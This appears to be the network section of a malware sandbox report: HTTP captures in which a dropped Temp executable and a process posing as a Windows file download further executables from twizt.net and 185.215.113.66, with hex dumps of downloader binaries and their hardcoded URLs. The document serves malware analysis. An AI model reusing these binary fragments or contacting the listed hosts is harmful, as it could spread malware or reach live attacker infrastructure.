                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 64 0e 23 23 05 60 70 23 05 60 70 23 05 60 70 2a 7d f3 70 21 05 60 70 2a 7d f5 70 22 05 60 70 2a 7d e3 70 36 05 60 70 04 c3 1b 70 28 05 60 70 23 05 61 70 18 05 60 70 2a 7d e4 70 20 05 60 70 2a 7d f1 70 22 05 60 70 52 69 63 68 23 05 60 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b8 c7 44 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 0e 00 00 00 14 00 00 00 00 00 00 19 17 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 3f d4 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$gd##`p#`p#`p*}p!`p*}p"`p*}p6`pp(`p#ap`p*}p `p*}p"`pRich#`pPELDf @`?@l$@P#@ .textz `.rdata4 @@.data0@.rsrc@ @@.relocP$@B
                                                                                                                                                        Oct 26, 2024 07:26:17.704797029 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 ec 54 6a 44 8d 44 24 14 6a 00 50 e8 eb 03 00 00 83 c4 0c 33 c0 8d 14 24 52 89 44 24 04
                                                                                                                                                        Data Ascii: TjDD$jP3$RD$D$D$D$D$Pjjj jjfL$\L$tjQjD$8DD$d @uh$ @T2T,SUV @Psh$4Ph !@D$ @H
                                                                                                                                                        Oct 26, 2024 07:26:17.704834938 CEST224INData Raw: 18 3b c6 75 07 33 f6 46 8b de eb 10 68 e8 03 00 00 ff 15 24 20 40 00 eb da 33 f6 46 a1 78 33 40 00 3b c6 75 0a 6a 1f e8 a8 02 00 00 59 eb 2f a1 78 33 40 00 85 c0 75 20 89 35 78 33 40 00 68 1c 21 40 00 68 10 21 40 00 e8 f7 04 00 00 59 59 85 c0 74
                                                                                                                                                        Data Ascii: ;u3Fh$ @3Fx3@;ujY/x3@u 5x3@h!@h!@YYt.540@x3@;uh!@h!@YYx3@uSWL @=3@th3@Ytjjj3@ @0u< wLt}uBt< wFuE
                                                                                                                                                        Oct 26, 2024 07:26:17.704866886 CEST1236INData Raw: 74 06 0f b7 45 c8 eb 03 6a 0a 58 50 56 6a 00 68 00 00 40 00 e8 37 fe ff ff a3 30 30 40 00 83 3d 24 30 40 00 00 75 5b 50 ff 15 9c 20 40 00 3c 22 75 0b 33 c9 39 4d e4 0f 94 c1 89 4d e4 0f b6 c0 50 ff 15 a0 20 40 00 59 85 c0 74 04 46 89 75 e0 46 eb
                                                                                                                                                        Data Ascii: tEjXPVjh@700@=$0@u[P @<"u39MMP @YtFuFEMPQYYeE00@=$0@uP @=40@u @E00@3@eEMZf9@t3M<@@8PEuHtu
                                                                                                                                                        Oct 26, 2024 07:26:17.704901934 CEST1236INData Raw: 75 08 68 46 1b 40 00 68 10 30 40 00 e8 f1 00 00 00 83 c4 18 5d c3 8b ff 56 68 00 00 03 00 68 00 00 01 00 33 f6 56 e8 e3 00 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 cc 00 00 00 83 c4 14 5e c3 33 c0 c3 8b ff 55 8b ec 83 ec 10 a1 10 30 40 00 83
                                                                                                                                                        Data Ascii: uhF@h0@]Vhh3VtVVVVV^3U0@eeSWN@;tt0@`VEP4 @u3u0 @3, @3 @3EP( @E3E3;uO@u50@50@^_[%X @%\ @% @%d @;
                                                                                                                                                        Oct 26, 2024 07:26:17.704936981 CEST424INData Raw: 70 00 25 00 00 00 00 00 25 00 73 00 5c 00 25 00 64 00 25 00 64 00 2e 00 65 00 78 00 65 00 00 00 4d 00 6f 00 7a 00 69 00 6c 00 6c 00 61 00 2f 00 35 00 2e 00 30 00 20 00 28 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 4e 00 54 00 20 00 31 00
                                                                                                                                                        Data Ascii: p%%s\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safa
                                                                                                                                                        Oct 26, 2024 07:26:17.704971075 CEST1236INData Raw: 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 39 33 2e 30 2e 34 35 37 37 2e 38 32 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 00 00 68 74 74 70 3a 2f 2f 74 77 69 7a 74 2e 6e 65 74 2f 70 65 69 6e 73
                                                                                                                                                        Data Ascii: 7.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36http://twizt.net/peinstall.php%temp%%s\33573537.jpghttp://twizt.net/newtpp.exeP0@0@H
                                                                                                                                                        Oct 26, 2024 07:26:17.705004930 CEST1236INData Raw: 6f 6b 65 5f 77 61 74 73 6f 6e 00 00 3f 01 5f 63 6f 6e 74 72 6f 6c 66 70 5f 73 00 00 4b 01 5f 63 72 74 5f 64 65 62 75 67 67 65 72 5f 68 6f 6f 6b 00 00 6a 00 49 6e 74 65 72 6e 65 74 43 6c 6f 73 65 48 61 6e 64 6c 65 00 9e 00 49 6e 74 65 72 6e 65 74
                                                                                                                                                        Data Ascii: oke_watson?_controlfp_sK_crt_debugger_hookjInternetCloseHandleInternetReadFileInternetOpenUrlWInternetOpenWInternetOpenUrlAInternetOpenAWININET.dllfURLDownloadToFileWurlmon.dll!SleepCreateProcessWDelet
                                                                                                                                                        Oct 26, 2024 07:26:17.705034971 CEST24INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Oct 26, 2024 07:26:17.705070019 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                        Data Ascii:
                                                                                                                                                        Oct 26, 2024 07:26:17.710383892 CEST668INData Raw: 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e
                                                                                                                                                        Data Ascii: INGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGt^0n00000011/1S1d11111112$2,222}2222333"3)3d3j3{333333


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        1192.168.2.549721185.215.113.66807348C:\Users\user\AppData\Local\Temp\4BBF.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Oct 26, 2024 07:26:19.861862898 CEST174OUTGET /newtpp.exe HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                        Host: twizt.net
                                                                                                                                                        Oct 26, 2024 07:26:20.780653954 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:20 GMT
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Length: 85504
                                                                                                                                                        Last-Modified: Thu, 10 Oct 2024 07:41:50 GMT
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        ETag: "6707853e-14e00"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 [TRUNCATED]
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$mpj)9)9)9 9.9Q8+9C9+9A9(99+9s9-9)99e9<9 9-9 959 9(9Rich)9PELgp@y@p|0.text `.rdata?@@@.data.@2@
                                                                                                                                                        Oct 26, 2024 07:26:20.780675888 CEST112INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b 6c 24 08 8b 45 20 56 33 f6 57 8b 7c 24 20 85 c0 74 1c 8b 4f 04 39 08 75 0a 66
                                                                                                                                                        Data Ascii: Ul$E V3W|$ tO9ufPf;Wt@uu"j
                                                                                                                                                        Oct 26, 2024 07:26:20.780704975 CEST1236INData Raw: 00 8b f0 8b 47 04 89 06 66 8b 4f 02 66 89 4e 04 8b 55 20 89 56 1c 83 c4 04 89 75 20 e8 c5 ce 00 00 8b 4c 24 14 8b 7c 24 18 89 46 08 8b 44 24 1c 50 51 e8 0f 05 00 00 83 c4 08 84 c0 74 75 53 8d a4 24 00 00 00 00 8b 4e 0c 83 f9 04 72 64 8b 46 18 8b
                                                                                                                                                        Data Ascii: GfOfNU Vu L$|$FD$PQtuS$NrdF;wX}xttSWTAuD$$MPSWUNxF;uF+tP9RQA)~[_^]USV3W}\$OD$Phf@QD$
                                                                                                                                                        Oct 26, 2024 07:26:20.780724049 CEST1236INData Raw: 6a 01 8d 54 24 28 52 6a 04 66 89 44 24 1a c6 44 24 30 01 8b 46 08 68 ff ff 00 00 50 ff 15 18 02 41 00 8b 56 08 6a 10 8d 4c 24 10 51 52 ff 15 1c 02 41 00 83 f8 ff 75 12 56 e8 e4 fd ff ff 83 c4 04 5e 5b 33 c0 5f 83 c4 10 c3 6a 00 6a 00 56 68 00 11
                                                                                                                                                        Data Ascii: jT$(RjfD$D$0FhPAVjL$QRAuV^[3_jjVh@jj^AF^[_FS2Ul$;FvNPQFFFT$FWRP~;uF;vu]F[Ft;r+F][+n][W
                                                                                                                                                        Oct 26, 2024 07:26:20.780740976 CEST1236INData Raw: 3e 69 6c 63 69 75 07 8b c6 e8 00 03 00 00 8b 3d 34 01 41 00 ff d7 8b 74 24 0c 2b c6 3d e8 03 00 00 72 3e 8d 73 20 56 ff 15 f4 00 41 00 8b 7b 38 85 ff 74 24 83 bf 60 02 00 00 ff 74 16 8b bf 80 02 00 00 85 ff 75 ed 56 ff 15 f8 00 41 00 e9 80 00 00
                                                                                                                                                        Data Ascii: >ilciu=4At$+=r>s VA{8t$`tuVAVAr+='rgC PAs8tBjVRXA+r`tPf`uC PA4AD$CjP`A_^[]
                                                                                                                                                        Oct 26, 2024 07:26:20.780756950 CEST1236INData Raw: 24 18 89 44 24 08 8b 87 70 02 00 00 89 54 24 1c 8b 97 7c 02 00 00 8d 4c 24 08 51 89 44 24 18 8b 46 28 52 b9 02 00 00 00 8b d7 89 44 24 28 e8 57 f8 ff ff 83 c4 08 5f 5e 83 c4 1c c3 83 c6 14 56 ff 15 64 00 41 00 6a 04 8d 54 24 2c 52 b8 01 00 00 00
                                                                                                                                                        Data Ascii: $D$pT$|L$QD$F(RD$(W_^VdAjT$,RhfD$4`h3PufL$>A`QA`_^U- AVW|$jD$PGL$QT$ 3RPt$(t$ t$$L$;twSu*T$ RT$jD$ P
                                                                                                                                                        Oct 26, 2024 07:26:20.780772924 CEST1236INData Raw: 00 00 00 02 00 00 89 96 28 02 00 00 ff 15 fc 00 41 00 83 c7 3c 57 ff 15 5c 00 41 00 e8 35 fe ff ff 8b c6 5e 5b 5f 5d c3 56 e8 a8 87 00 00 83 c4 04 33 f6 55 e8 2d 91 00 00 83 c4 04 8b c6 5e 5b 5f 5d c3 cc cc cc 56 8b 74 24 08 85 f6 74 3a 81 3e 69
                                                                                                                                                        Data Ascii: (A<W\A5^[_]V3U-^[_]Vt$t:>ilciu2tu)|@P\AL$tx^^UQj%EjMUMAUBE]UQEM
                                                                                                                                                        Oct 26, 2024 07:26:20.780790091 CEST1236INData Raw: 8b 11 52 e8 fa 82 00 00 83 c4 04 8b 45 08 c7 00 00 00 00 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 1c 8b 45 0c 25 ff ff 00 00 89 45 e4 8b 4d 0c c1 e9 10 81 e1 ff ff 00 00 89 4d ec 8b 55 10 81 e2 ff ff 00 00 89 55 fc 8b 45 10 c1
                                                                                                                                                        Data Ascii: RE]UE%EMMUUE%EMMUEEEMMMUUUE;EsEEMUMEEMUEM;UsEEMMUJEHM
                                                                                                                                                        Oct 26, 2024 07:26:20.780806065 CEST1236INData Raw: eb 07 c7 45 fc 00 00 00 00 8b 4d f8 8b 55 08 8b 04 8a 8b 4d f8 8b 55 10 03 04 8a 8b 4d f8 8b 55 08 89 04 8a 8b 45 f8 8b 4d 08 8b 55 f8 8b 75 10 8b 04 81 3b 04 96 73 09 8b 4d fc 83 c1 01 89 4d fc eb 82 8b 45 fc 5e 8b e5 5d c3 cc cc cc 55 8b ec 83
                                                                                                                                                        Data Ascii: EMUMUMUEMUu;sMME^]UEEMMEUUE9EsMUEEEM;MUE<uMMUEEEEM;MU
                                                                                                                                                        Oct 26, 2024 07:26:20.780823946 CEST1236INData Raw: dc e9 4a fe ff ff 8b 4d fc 89 4d d0 eb 09 8b 55 d0 83 c2 01 89 55 d0 8b 45 cc 03 45 fc 39 45 d0 7d 0f 8b 4d d0 8b 55 e4 c7 04 8a 00 00 00 00 eb dd 8b 45 fc 50 8b 4d c8 51 8b 55 0c 52 8b 45 0c 50 e8 d4 06 00 00 83 c4 10 8b 4d fc 51 8b 55 c8 52 8b
                                                                                                                                                        Data Ascii: JMMUUEE9E}MUEPMQUREPMQUREPMQ3]U}uEEEEEM;MUEQUREPMU+EMU+EMU9vEE
                                                                                                                                                        Oct 26, 2024 07:26:20.786729097 CEST1236INData Raw: 7d f8 00 75 04 33 c0 eb 49 c7 45 fc 00 00 00 00 c7 45 f4 00 00 00 80 eb 11 8b 55 f4 d1 ea 89 55 f4 8b 45 fc 83 c0 01 89 45 fc 83 7d f4 00 76 13 8b 4d f8 8b 55 08 8b 44 8a fc 23 45 f4 74 02 eb 02 eb d6 8b 4d f8 c1 e1 05 2b 4d fc 89 4d f0 8b 45 f0
                                                                                                                                                        Data Ascii: }u3IEEUUEE}vMUD#EtM+MME]UQVEEEM;MsUEMu^]UEEMUUtEMUEE]UQEEEM;Ms
                                                                                                                                                        Oct 26, 2024 07:26:25.246774912 CEST176OUTGET /peinstall.php HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                                                                                        Host: twizt.net
                                                                                                                                                        Oct 26, 2024 07:26:25.627481937 CEST184INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:25 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.549771185.215.113.66807488C:\Windows\sysppvrdnvs.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Oct 26, 2024 07:26:30.994864941 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                        Host: 185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:31.911458969 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:31 GMT
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Length: 110600
                                                                                                                                                        Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        ETag: "66f3a94a-1b008"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                        Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                        Oct 26, 2024 07:26:31.911535025 CEST112INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                        Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:
                                                                                                                                                        Oct 26, 2024 07:26:31.911545992 CEST1236INData Raw: df 50 5e 7f 28 4b 33 04 b4 3a a9 20 79 58 ed e3 8d 4d 5e 67 51 44 02 be a3 81 02 86 c9 f0 14 35 97 13 d9 96 cd e0 8c 35 1e b0 21 48 c2 e1 c2 46 e2 3f 1f af 7d 27 2b bf d5 57 0d 78 72 8d 70 c8 38 de 55 5f 48 89 81 a8 19 d0 bc 93 4b 5c e0 ff b8 c2
                                                                                                                                                        Data Ascii: P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu BUHj{y0mlU"3S+I)~5DX#o&n3_$by<DLy/9o-T&ge1c80G~q!&
                                                                                                                                                        Oct 26, 2024 07:26:31.911556959 CEST1236INData Raw: 0c 17 99 f2 dc 4c 43 4c 1b 74 a4 2e 3b 7f 13 7b 31 10 68 ce 33 5d c9 ef c7 81 17 80 74 c1 fc 96 e6 99 a0 cf 08 de f9 ef c7 af b3 99 89 2e b0 c0 b8 e1 91 45 69 65 c0 5c 3f 1f 96 c7 05 7c c3 36 20 3a d9 99 20 a3 04 33 c0 2b cd 06 60 f3 53 fd 82 9c
                                                                                                                                                        Data Ascii: LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4LlLAq5;z#@M8id8[y7*pZN$S<[Z88Al5r6^9Cko+
                                                                                                                                                        Oct 26, 2024 07:26:31.911569118 CEST1236INData Raw: 2c c0 09 b2 53 27 5c 5f 4b 92 e5 70 d1 58 a1 7e 68 f0 f8 2d 01 0b ae f2 ef 1d fd 76 3e 43 44 79 12 e8 03 d8 c6 49 d5 28 b9 14 42 6b 25 e2 aa ea b4 fb 50 1e bd 72 08 e3 be 09 fc 52 71 27 3f 1a 20 cd ab 85 b8 04 a4 b9 8a 0a 97 92 1d 0a c1 e5 9f d3
                                                                                                                                                        Data Ascii: ,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA|MZz,J-ZoUS-,T`i?`xqc[)2~pHTV 6RCju.,jA
                                                                                                                                                        Oct 26, 2024 07:26:31.911587954 CEST1236INData Raw: 70 7b bc f5 b5 3b dc 79 f2 61 41 e6 ae 67 58 ff 70 b0 e5 cb 23 20 e0 db 7f fa 3f 12 a7 b3 ab 9c b1 b0 7d d7 30 5f e3 1f 4c 49 ba 61 d9 ff c5 7b 13 b3 67 32 03 8a 4d b2 4c 32 29 a2 9b ae 38 f4 33 e5 76 c7 16 e4 5a e9 e9 58 3b 0d be 8c 7f fb 2a 4d
                                                                                                                                                        Data Ascii: p{;yaAgXp# ?}0_LIa{g2ML2)83vZX;*M#>}df(gz;OE\wd(afrc@(Q0BJ*G2^{3k{$?imUMrbd<58qqH!]C'L l~FseDp?X7
                                                                                                                                                        Oct 26, 2024 07:26:31.911601067 CEST548INData Raw: 63 34 fc c6 c6 48 5c d3 fa cd e0 9b f9 6c 0b 41 9e aa 09 76 cf 23 4e 60 27 cb f4 36 5a 5c 53 c7 11 93 42 4a 91 a7 00 c1 21 72 e2 97 f5 56 32 30 53 7b 88 7d cf 72 eb 02 1a 4c 1e ad 0a 8e 64 a4 61 ef cc e7 c7 64 2b 30 12 68 bd 09 18 7f e5 a2 82 1f
                                                                                                                                                        Data Ascii: c4H\lAv#N`'6Z\SBJ!rV20S{}rLdad+0hFaGv:;]ud8[H9PCE=YdC//7Mo:_[nU4&-+T3U,%S!&C+?0p[}f*5&hj5[@B
                                                                                                                                                        Oct 26, 2024 07:26:31.911608934 CEST1236INData Raw: c5 ff 56 13 f0 5c 33 a0 fa f0 c9 91 56 2a da 57 b1 a0 5d 31 60 98 d3 80 b8 e2 b1 91 0e f9 69 77 b0 36 6d 2a b7 40 06 cd 49 fc 0a 65 10 10 22 09 6f 15 d8 e2 dd b0 55 6c ef 2a 23 5e f3 72 aa 97 53 5a ca 74 a9 6b 83 92 91 2e 5b b8 de 95 44 f7 17 ea
                                                                                                                                                        Data Ascii: V\3V*W]1`iw6m*@Ie"oUl*#^rSZtk.[D`i!A&\NtYJ@xi}S6s@%e i$+'JccC{d,;HGj("IMHM;"C*@=
                                                                                                                                                        Oct 26, 2024 07:26:31.911621094 CEST1236INData Raw: d2 bd 6a 4f b3 f3 04 fd dc 8f 4f 96 d4 d9 78 d6 71 22 12 a0 26 ee 4c 98 92 fa 8b f7 60 62 d2 48 5b 9c 20 f3 ab a1 00 23 51 da cb 45 93 a3 0b c0 aa 32 dc 5d 20 9b af 53 0c de 0c 96 80 4e 52 82 a5 e3 34 73 ce 83 78 32 e8 77 f0 e5 9c fd 79 ba 01 1c
                                                                                                                                                        Data Ascii: jOOxq"&L`bH[ #QE2] SNR4sx2wyHqDFA/ga:{X>O!{\o9P-\ g(y1EGK9/pvAyNbgZF'%V[X$x7Z'Owa5hhyX&1
                                                                                                                                                        Oct 26, 2024 07:26:31.911633015 CEST1236INData Raw: a5 35 46 00 1b d9 e1 f8 95 8e ef 7b 6b d8 19 b5 11 e3 cf 43 42 f3 d5 ce 94 74 d1 d3 7c c4 63 16 3f ed 3b 70 02 93 a7 7e cd b0 b8 dd ec 38 97 ef e3 7f e0 95 e6 c2 d1 10 46 bd 45 ad 21 31 a1 0f 83 2a 92 bc eb 76 df f7 99 a5 73 af bf 37 86 2e a1 30
                                                                                                                                                        Data Ascii: 5F{kCBt|c?;p~8FE!1*vs7.0du=rFWu&uLD,6|< b&zhH}bt^%/m=ES/noaYQ*j% b/',P@zB%7O]N0}YZ2:H%>%i)uE
                                                                                                                                                        Oct 26, 2024 07:26:31.917013884 CEST1236INData Raw: 01 1d ec 02 cf 5f 90 a1 5a 7d ac f5 02 1f 61 f6 2e 95 3a d9 d7 45 bd b2 a5 43 1a 63 62 a4 ef 8d 50 b8 c6 19 72 5c 1b 7d 7a fc 10 39 54 eb 7d 2e f3 27 93 8f 41 ce dd eb 1c f9 bf bf 80 40 26 db 1c 7a 0b 7b 03 ca d6 4d 91 b1 54 fe 99 c7 a6 47 66 9f
                                                                                                                                                        Data Ascii: _Z}a.:ECcbPr\}z9T}.'A@&z{MTGfCyi&)sR0WjC0h3;_L';/HnL +<@$5y}:*kzM#mLUbqu8h;! u=voy.Y=;"v5!=VS


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.549784185.215.113.66807488C:\Windows\sysppvrdnvs.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Oct 26, 2024 07:26:32.925695896 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                        Host: 185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:33.827378988 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:33 GMT
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Length: 110600
                                                                                                                                                        Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        ETag: "66f3a94a-1b008"
                                                                                                                                                        Accept-Ranges: bytes
